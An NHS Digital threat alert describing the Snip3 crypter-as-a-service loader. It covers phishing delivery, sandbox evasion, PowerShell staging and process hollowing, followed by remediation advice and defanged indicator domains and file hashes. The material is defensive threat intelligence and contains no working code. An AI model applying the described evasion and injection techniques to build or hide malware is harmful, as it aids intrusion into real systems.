Skip to main content
Snip3 RAT Loader

Snip3 is a Crypter-as-a-Service which includes a loader that has been involved in some recent campaigns involving RevengeRAT and AsyncRAT.

Report a cyber attack: call 0300 303 5222 or email carecert@nhsdigital.nhs.uk

Summary

Snip3 is a Crypter-as-a-Service which includes a loader that has been involved in some recent campaigns involving RevengeRAT and AsyncRAT.


Affected platforms

The following platforms are known to be affected:

Threat details

Introduction

First observed in February 2021, Snip3 is a loader and sophisticated Crypter-as-a-Service that delivers several remote access trojans (RAT) onto target machines. Snip3 has been recently attributed to RevengeRAT and AsyncRAT which have been involved in spear phishing email campaigns.


Delivery

The Snip3 RAT crypter is commonly delivered through phishing emails, however has been seen to be distributed through a large install file; one being a decoy Adobe installer. The crypter uses advanced techniques to avoid detection including checking the existence of VMWare and Windows Sandbox virtualisation, using Pastebin and top4top for staging and executing PowerShell script using the RemoteSigned parameter. There are different variants that have been detected. They all use a VB script that decodes a PowerShell script and then downloads, saves, and executes a second stage PowerShell script.


Activities

Once Snip3 has been deployed, the payload is injected into a running InstallUtil.exe or RegSvcs.exe process. This uses a RunPE technique to modify the memory contents. To help evade detection the RunPE method is embedded as compressed source code and compiled at runtime. Once compiled, PowerShell is then used to load and execute the RunPE function along with the RAT payload. The final payload is executed in the hollowed process memory.


Remediation advice

To prevent and detect an infection, NHS Digital advises that:

  • Secure configurations are applied to all devices.
  • Security updates are applied at the earliest opportunity.
  • Tamper protection settings in security products are enabled where available.
  • Obsolete platforms are segregated from the rest of the network.
  • IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
  • Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
  • Administrative accounts are only used for necessary purposes.
  • Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
  • Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.

Please note that NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.


Indicators of compromise

Network indicators

Domains

  • asin8988[.]ddns[.]net
  • asin8989[.]ddns[.]net
  • asin8990[.]ddns[.]net
  • h0pe1759[.]ddns[.]net
  • kexa600200[.]ddns[.]net
  • kimjoy007[.]dyndns[.]org
  • kimjoy[.]ddns[.]net
  • mail.alamdarhardware[.]com
  • n0ahark2021[.]ddns[.]net

Host Indicators

SHA256 hashes

  • 055e3fc1e814fd23db5950fe2858c06042c911e47dc81c96d8aec8e3d20f3eaf
  • 08f3a0e2cc6e748bd5843e31a5c1ca27b4777a3e06f3aa254a830abf9ba34e11
  • 146f7a39df033afe4bb001da5b4a6eceb89f9efab5538c470b7f7f3cb4bbd15e
  • 17a97f5698f2f19b4b43dc985193f734f8146c83d73daf853df9506f58b696b3
  • 23d4837df84a76f96c674581c96e6a1729bac2981787d3b36ac5149d861f13e5
  • 3378488a2930d73c433e9bbedbeb9065753dd5e236552aa80dd553a7e73ce693
  • 54338b912efb3f4ee2f6760b97d57f924b96215c28c53715cadb7d6636ac6403
  • 620b8057f975eb2475b9a5a0756f21d4b866acc1f02c418ee3d994b74ee6bb77
  • 64345e03d3cc3c080eeb19bdc8db8ddd386083bae3690554b22ee97471354f3
  • 83c50b63c53421202059c528c855b487bc6651a785b40fe521a7e892e4dcd00
  • 8c8e3494796cbd908da7555cff60ed755b18d2b24b398d57a1d8622990d47495
  • 93b0f634bf697c39175a5ad77cc16e4dabf3a10bb0fe81d7a77156d7e5e6ff12
  • 982fb66d84c3d4c8665af9d24a22f3a32c4b9c1aab322db2c79cbe618ed28294
  • aefeb07afc0d9f4d09ab09317db14edef1b58df175f70cf6ea88d7f6cdce8cfc
  • b1606f9dc2798f3bcb1db5bd72eeb4720ada1ba13e9d769d223f5f7df8be9a8f
  • c06fdc9f0dbfd0b42d74c9226ed28f3f52b5bfc04af70f58b8b5b16439196184
  • c8ca46366ec70b0463b3ee7e747c1c22e1d42f7e7e77e0e896edf99aebdbeb10
  • d452cee94e3a2d58b05e9f62a4aa4004c0632d9b56fa8b57664d295bc88c4df0
  • e38f7a1882ac64fab611b3be73fda7eece5fb9a6ea131b36985aa60a0988e937
  • e8aca8f27af178b2c191206c7bc04bfddc604a78b95699a72ca20c22f618c9b0

Last edited: 20 May 2021 4:19 pm